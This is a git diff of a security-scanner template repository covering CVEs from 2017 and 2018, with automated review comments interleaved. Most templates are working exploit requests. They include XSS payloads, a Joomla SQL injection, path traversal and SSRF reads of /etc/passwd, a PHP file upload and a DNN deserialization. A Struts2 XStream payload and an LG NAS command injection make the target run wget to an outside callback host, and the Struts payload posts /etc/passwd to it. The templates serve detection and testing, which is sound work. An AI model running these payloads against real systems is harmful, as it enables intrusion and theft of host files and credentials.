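Review bot: The matchers only confirm that `/esp/cms_changeDeviceContext.esp` answered 200 with `@start@Success@end@`, so as far as the visible request shows a hit means the unauthenticated request was accepted, not that code ran, although the title says Remote Code Execution. A comment above `matchers:` such as `# confirms the crafted request was accepted; no command is executed by this template` would keep triage from overstating the result. The description places the flaw in the management interface, so the `vpn,globalprotect` tags look misplaced, and `classification` has no `cwe-id`.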
@@ -1,34 +0,0 @@ -id: CVE-2017-17451 -info: - name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 - - https://wordpress.org/plugins/wp-mailster/#developers - - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html - - https://wpvulndb.com/vulnerabilities/8973 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-17451 - cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-18536-2995.yaml b/poc/cve/cve-2017-18536-2995.yaml deleted file mode 100644 index 931dee4892..0000000000 --- a/poc/cve/cve-2017-18536-2995.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2017-18536 -info: - name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. - reference: - - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - - https://wordpress.org/plugins/stop-user-enumeration/#developers - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-18536 - cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-3528-3012.yaml b/poc/cve/cve-2017-3528-3012.yaml deleted file mode 100644 index 6b985fcdae..0000000000 --- a/poc/cve/cve-2017-3528-3012.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2017-3528 -info: - name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect - author: 0x_Akoko - severity: medium - description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.' - reference: - - https://blog.zsec.uk/cve-2017-3528/ - - https://www.exploit-db.com/exploits/43592 - - https://nvd.nist.gov/vuln/detail/CVE-2017-3528 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2017-3528 - cwe-id: CWE-601 - tags: cve,cve2017,oracle,redirect -requests: - - method: GET - path: - - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" - matchers: - - type: word - words: - - 'noresize src="/\example.com?configName=' - part: body - -# Enhanced by mp on 2022/04/14 diff --git a/poc/cve/cve-2017-5487.yaml b/poc/cve/cve-2017-5487.yaml deleted file mode 100644 index fb218d1b4e..0000000000 --- a/poc/cve/cve-2017-5487.yaml +++ /dev/null 
@@ -1,67 +0,0 @@ -id: CVE-2017-5487 - -info: - name: WordPress Core <4.7.1 - Username Enumeration - author: Manas_Harsh,daffainfo,geeknik,dr0pd34d - severity: medium - description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request. - remediation: | - Update WordPress to version 4.7.1 or later - reference: - - https://www.exploit-db.com/exploits/41497 - - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ - - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - - http://www.openwall.com/lists/oss-security/2017/01/14/6 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2017-5487 - cwe-id: CWE-200 - epss-score: 0.97179 - epss-percentile: 0.99764 - cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: wordpress - product: wordpress - shodan-query: http.component:"WordPress" - tags: cve,cve2017,wordpress,wp,edb - -http: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/users/" - - "{{BaseURL}}/?rest_route=/wp/v2/users/" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"id":' - - '"name":' - - '"avatar_urls":' - condition: and - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 - - extractors: - - type: json - name: "usernames" - json: - - '.[] | .slug' - - '.[].name' - part: body - -# digest: 
4a0a0047304502210088c108008f20fad24053aba17b4e6a0b1a3ef03c76227a57bf3df1331883b921022075e239bf86f3c3649c02f55a50e854a30f69684afb3558a5fcd83d2b1c7f4259:922c64590222798bb761d5b6d8e72950
diff --git a/poc/cve/cve-2017-5521-3027.yaml b/poc/cve/cve-2017-5521-3027.yaml
new file mode 100644
index 0000000000..1ec3a1db53
--- /dev/null
+++ b/poc/cve/cve-2017-5521-3027.yaml
@@ -0,0 +1,40 @@
+id: CVE-2017-5521
+
+info:
+ name: NETGEAR Routers - Authentication Bypass
+ author: princechaddha
+ severity: high
+ description: |
+ NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
+ reference:
+ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
+ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
+ - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
+ - https://www.cvedetails.com/cve/CVE-2017-5521/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2017-5521
+ cwe-id: CWE-200
+ tags: cve,cve2017,auth-bypass,netgear,router
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "right\">Router\\s*Admin\\s*Username<"
+ - "right\">Router\\s*Admin\\s*Password<"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/poc/cve/cve-2017-5631-3031.yaml b/poc/cve/cve-2017-5631-3031.yaml
new file mode 100644
index 0000000000..39c6899af9
--- /dev/null
+++ b/poc/cve/cve-2017-5631-3031.yaml
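Review bot: The body matcher in cve-2017-5521-3027.yaml is declared `type: word`, but both strings contain `\\s*`, which a word matcher compares as literal characters rather than as optional whitespace, so the template will presumably miss affected routers. Make it a regex matcher by changing the two lines to `- type: regex` and `regex:`, keeping both patterns and `condition: and`. A hit means the response carried the router's admin username and password, so results from this template should be handled as credentials.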
@@ -0,0 +1,34 @@
+id: CVE-2017-5631
+info:
+ name: CaseAware - Cross Site Scripting
+ author: edoardottt
+ severity: medium
+ description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5631
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631
+ - https://www.openbugbounty.org/incidents/228262/
+ - https://www.exploit-db.com/exploits/42042/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-5631
+ cwe-id: CWE-79
+ tags: cve,cve2017,xss,caseaware
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "'>"
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2017-6090-3044.yaml b/poc/cve/cve-2017-6090-3044.yaml
deleted file mode 100644
index 38352df854..0000000000
--- a/poc/cve/cve-2017-6090-3044.yaml
+++ /dev/null
@@ -1,44 +0,0 @@ -id: CVE-2017-6090 - -info: - name: PhpCollab (unauthenticated) Arbitrary File Upload - author: pikpikcu - severity: high - tags: cve,cve2017,phpcollab,rce,fileupload - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2017-6090 - cwe-id: CWE-434 - description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." - -requests: - - raw: - - | # REQUEST 1 - POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 - - -----------------------------154934846911423734231554128137 - Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" - Content-Type: application/x-php - - - - -----------------------------154934846911423734231554128137-- - - - | # REQUEST 2 - GET /logos_clients/1.php HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "48dbd2384cb6b996fa1e2855c7f0567f" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2017-7391.yaml b/poc/cve/cve-2017-7391.yaml deleted file mode 100644 index 664a04a732..0000000000 --- a/poc/cve/cve-2017-7391.yaml +++ /dev/null 
@@ -1,49 +0,0 @@ -id: CVE-2017-7391 - -info: - name: Magmi 0.7.22 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL. - remediation: | - Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability. - reference: - - https://github.com/dweeves/magmi-git/issues/522 - - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip - - https://github.com/dweeves/magmi-git/pull/525 - - https://nvd.nist.gov/vuln/detail/CVE-2017-7391 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-7391 - cwe-id: CWE-79 - epss-score: 0.00195 - epss-percentile: 0.57269 - cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: magmi_project - product: magmi - tags: cve,cve2017,magmi,xss - -http: - - method: GET - path: - - "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"><' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a0047304502204bc17576c68fe07f6f9770192a4c68052f31affbfd406bd8ecc554f63474f3fd022100b9f925fb36412f55a8b884b739601290a92729386e5d44b2594564337c9a808b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2017-8917-3078.yaml b/poc/cve/cve-2017-8917-3078.yaml new file mode 100644 index 0000000000..7bc43442b0 --- /dev/null +++ b/poc/cve/cve-2017-8917-3078.yaml 
@@ -0,0 +1,29 @@
+id: CVE-2017-8917
+info:
+ name: Joomla! <3.7.1 - SQL Injection
+ author: princechaddha
+ severity: critical
+ description: |
+ Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors.
+ reference:
+ - https://www.cvedetails.com/cve/CVE-2017-8917/
+ - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
+ - http://www.securityfocus.com/bid/98515
+ - http://www.securitytracker.com/id/1038522
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2017-8917
+ cwe-id: CWE-89
+ tags: cve,cve2017,joomla,sqli
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)"
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "cf79ae6addba60ad018347359bd144d2"
+
+# Enhanced by mp on 2022/05/11
diff --git a/poc/cve/cve-2017-9805-3104.yaml b/poc/cve/cve-2017-9805-3104.yaml
new file mode 100644
index 0000000000..c60d7eebd9
--- /dev/null
+++ b/poc/cve/cve-2017-9805-3104.yaml
@@ -0,0 +1,93 @@ +id: CVE-2017-9805 +info: + name: Apache Struts2 S2-052 - Remote Code Execution + author: pikpikcu + severity: high + description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. + reference: + - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html + - https://struts.apache.org/docs/s2-052.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2017-9805 + cwe-id: CWE-502 + tags: cve,cve2017,apache,rce,struts +requests: + - method: POST + path: + - "{{BaseURL}}/struts2-rest-showcase/orders/3" + - "{{BaseURL}}/orders/3" + headers: + Content-Type: application/xml + body: | + + + + 0 + + + + + + false + 0 + + + + + + wget + --post-file + /etc/passwd + {{interactsh-url}} + + false + + + + + java.lang.ProcessBuilder + start + + + asdasd + + asdasd + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + + + matchers-condition: and + matchers: + - type: word + words: + - "Debugging information" + - "com.thoughtworks.xstream.converters.collections.MapConverter" + condition: and + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/poc/cve/cve-2017-9822-3106.yaml b/poc/cve/cve-2017-9822-3106.yaml new file mode 100644 index 0000000000..09de04f19d --- /dev/null +++ b/poc/cve/cve-2017-9822-3106.yaml 
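Review bot: The request body makes the target run `wget --post-file /etc/passwd {{interactsh-url}}`, yet neither matcher looks at the interactsh interaction; detection rests only on a 500 response containing `Debugging information` and the XStream `MapConverter` string. The template therefore sends a host file to an external server with no detection benefit, and the matched error text alone may not prove the command ran. I would remove the file post from the command and mark the template so it is excluded from default scans, `tags: cve,cve2017,apache,rce,struts,intrusive`, the tag that cve-2017-12615.yaml (deleted in this patch) carried for the same reason. If the callback is kept, add a matcher on the interactsh part so that a finding reflects it.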
@@ -0,0 +1,36 @@ +id: CVE-2017-9822 + +info: + name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) + author: milo2012 + severity: high + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) + tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization + reference: https://github.com/murataydemir/CVE-2017-9822 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-9822 + cwe-id: CWE-20 + +requests: + - raw: + - | + GET /__ HTTP/1.1 + Host: {{Hostname}} + Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest + Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini + + matchers-condition: and + matchers: + - type: word + words: + - '[extensions]' + - 'for 16-bit app support' + part: body + condition: and + + - type: status + status: + - 404 diff --git a/poc/cve/cve-2018-1000129.yaml b/poc/cve/cve-2018-1000129.yaml new file mode 100644 index 0000000000..d05ad17b90 --- /dev/null +++ b/poc/cve/cve-2018-1000129.yaml 
@@ -0,0 +1,57 @@ +id: CVE-2018-1000129 + +info: + name: Jolokia 1.3.7 - Cross-Site Scripting + author: mavericknerd,0h1in9e,daffainfo + severity: medium + description: | + Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser. + remediation: | + Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability. + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad + - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html + - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000129 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-1000129 + cwe-id: CWE-79 + epss-score: 0.00257 + epss-percentile: 0.63364 + cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: jolokia + product: jolokia + tags: cve,cve2018,jolokia,xss + +http: + - method: GET + path: + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "java.lang.IllegalArgumentException" + - "No type with name" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100bf12ebc1eef56c2bcd2038e06cd60c8be836fe33c56730676aa1c79e2f436700022100e15bdc55c9aee1a5964dc94acbe4d9a1141591b8cc68bd0eb02fe0241481cc20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1000226-3139.yaml b/poc/cve/cve-2018-1000226-3139.yaml deleted file mode 100644 index 9ebcf5d7e6..0000000000 
--- a/poc/cve/cve-2018-1000226-3139.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2018-1000226 -info: - name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass - author: c-sh0 - reference: - - https://github.com/cobbler/cobbler/issues/1916 - - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 - severity: critical - tags: cve,cve2018,cobbler,auth-bypass - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-1000226 - cwe-id: CWE-732 -requests: - - raw: - - | - POST {{BaseURL}}/cobbler_api HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - - - - _CobblerXMLRPCInterface__make_token - - - cobbler - - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: header - words: - - "Content-Type: text/xml" - - type: word - part: body - words: - - "" - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - type: regex - part: body - regex: - - "(.*[a-zA-Z0-9].+==)" diff --git a/poc/cve/cve-2018-10818-3171.yaml b/poc/cve/cve-2018-10818-3171.yaml deleted file mode 100644 index 844ff2c7e6..0000000000 --- a/poc/cve/cve-2018-10818-3171.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2018-10818 - -info: - name: LG NAS Devices - Remote Code Execution (Unauthenticated) - author: gy741 - severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. - reference: - - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - classification: - cve-id: CVE-2018-10818 - tags: cve,cve2018,lg-nas,rce,oast,injection - -requests: - - raw: - - | - POST /system/sharedir.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - &uid=10; wget http://{{interactsh-url}} - - - | - POST /en/php/usb_sync.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - &act=sync&task_number=1;wget http://{{interactsh-url}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2018-11409.yaml b/poc/cve/cve-2018-11409.yaml new file mode 100644 index 0000000000..97307fe175 --- /dev/null +++ b/poc/cve/cve-2018-11409.yaml 
@@ -0,0 +1,46 @@
+id: CVE-2018-11409
+
+info:
+ name: Splunk <=7.0.1 - Information Disclosure
+ author: harshbothra_
+ severity: medium
+ description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
+ remediation: |
+ Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability.
+ reference:
+ - https://github.com/kofa2002/splunk
+ - https://www.exploit-db.com/exploits/44865/
+ - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-11409
+ - http://www.securitytracker.com/id/1041148
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2018-11409
+ cwe-id: CWE-200
+ epss-score: 0.89557
+ epss-percentile: 0.98463
+ cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: splunk
+ product: splunk
+ tags: edb,cve,cve2018,splunk
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
+ - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - licenseKeys
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4b0a00483046022100e3ebd015e6ef4bbc9998f71e485da5b27862f9292fb806ca585560b75dd733a4022100f65c3f6f92d9f2cf2e358ab9ae5755274ffbf38d886383f34455bcdb8f5071c8:922c64590222798bb761d5b6d8e72950
diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml
index 548327e206..2c901d72d1 100644
--- a/poc/cve/cve-2018-1271.yaml
+++ b/poc/cve/cve-2018-1271.yaml
@@ -1,30 +1,45 @@ id: CVE-2018-1271 + info: - name: Spring MVC Directory Traversal Vulnerability + name: Spring MVC Framework - Local File Inclusion author: hetroublemakr severity: medium - description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + description: Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + remediation: | + Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability. 
reference: - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - https://access.redhat.com/errata/RHSA-2018:1320 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1271 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 + epss-score: 0.004 + epss-percentile: 0.70707 + cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: vmware + product: spring_framework tags: cve,cve2018,spring,lfi,traversal -requests: + +http: - method: GET path: - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + matchers-condition: and matchers: - type: word words: - 'for 16-bit app support' + - type: status status: - 200 +# digest: 490a0046304402201377a352e5d2b8e850667829c827c23a9aca21c420bffa95af757d0e3f2cbf4c02205fb33a00e676e7861f56c9586523be155895cf5da0f492d4fe8e7d84c2e07c53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-14064-3301.yaml b/poc/cve/cve-2018-14064-3301.yaml deleted file mode 100644 index 5e29e1cb36..0000000000 --- a/poc/cve/cve-2018-14064-3301.yaml +++ /dev/null 
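Review bot: The rewritten `description` drops the precondition the old text stated, that static resources are served from a file system on Windows, although both request paths still probe `windows/win.ini`. Without it the template reads as applying to every Spring MVC deployment that serves static resources; I would keep a sentence such as `Only applications serving static resources from a file system on Windows are affected.` The new `name` also calls this local file inclusion while the classification stays `CWE-22` and the description itself ends on "directory traversal", so the old wording was the more consistent one.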
@@ -1,30 +0,0 @@ -id: CVE-2018-14064 -info: - name: VelotiSmart Wifi - Directory Traversal - author: 0x_Akoko - severity: critical - description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. - reference: - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-14064 - cwe-id: CWE-22 - tags: cve,cve2018,lfi,camera,iot -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/poc/cve/cve-2018-14728.yaml b/poc/cve/cve-2018-14728.yaml deleted file mode 100644 index 89fb385c06..0000000000 --- a/poc/cve/cve-2018-14728.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2018-14728 - -info: - name: Responsive filemanager 9.13.1 Server-Side Request Forgery - author: madrobot - severity: critical - description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. - remediation: | - Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability. - reference: - - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html - - https://www.exploit-db.com/exploits/45103/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-14728 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-14728 - cwe-id: CWE-918 - epss-score: 0.96381 - epss-percentile: 0.99433 - cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: tecrail - product: responsive_filemanager - tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive - -http: - - method: POST - path: - - "{{BaseURL}}/filemanager/upload.php" - - body: fldr=&url=file:///etc/passwd - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# digest: 